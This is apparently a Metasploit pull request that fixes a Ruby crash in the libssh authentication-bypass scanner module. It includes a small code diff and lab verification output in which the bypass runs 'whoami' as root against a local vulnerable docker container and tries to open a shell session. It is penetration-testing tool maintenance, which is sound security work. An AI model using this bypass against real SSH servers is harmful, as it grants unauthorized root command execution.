### PR TITLE
Fix libssh_auth_bypass crash on newer versions of Ruby

### DIFF
--- a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
+++ b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
@@ -128,6 +128,7 @@ class MetasploitModule < Msf::Auxiliary
       return
     end
 
+    print_status("Attempting #{action.name.inspect} Action, see \"show actions\" for more details")
     case action.name
     when 'Shell'
       if datastore['CreateSession']

--- a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
+++ b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
       info: version
     )
 
-    shell = Net::SSH::CommandStream.new(ssh, *config)
+    shell = Net::SSH::CommandStream.new(ssh, datastore['CMD'], pty: datastore['SPAWN_PTY'])
 
     # XXX: Wait for CommandStream to log a channel request failure
     sleep 0.1
@@ -152,12 +152,4 @@ class MetasploitModule < Msf::Auxiliary
   def username
     Rex::Text.rand_text_alphanumeric(8..42)
   end
-
-  def config
-    [
-      datastore['CMD'],
-      pty: datastore['SPAWN_PTY']
-    ]
-  end
-
 end


### PR DESCRIPTION
Closes https://github.com/rapid7/metasploit-framework/issues/18167

## Verification

Run the vulnerable ssh target:

```
docker run -it -p 3333:22 vulhub/libssh:0.8.1
```

Verify Execute action with a cmd module works:

```
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > rerun rhost=127.0.0.1 rport=3333 action=Execute CMD=whoami
[*] Reloading module...

[*] 127.0.0.1:3333 - Attempting authentication bypass
[+] 127.0.0.1:3333 - SSH-2.0-libssh_0.8.1 appears to be unpatched
[*] 127.0.0.1:3333 - Executed: whoami
root
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Verify a new session is created; Note that shell verification/interaction fails for me - but looks like an existing problem from when the functionality was first merged in?

```
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > rerun rhost=127.0.0.1 rport=3333 action=Shell
[*] Reloading module...

[*] 127.0.0.1:3333 - Attempting authentication bypass
[+] 127.0.0.1:3333 - SSH-2.0-libssh_0.8.1 appears to be unpatched
[-] Command shell session 3 is not valid and will be closed
[*] 127.0.0.1 - Command shell session 3 closed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```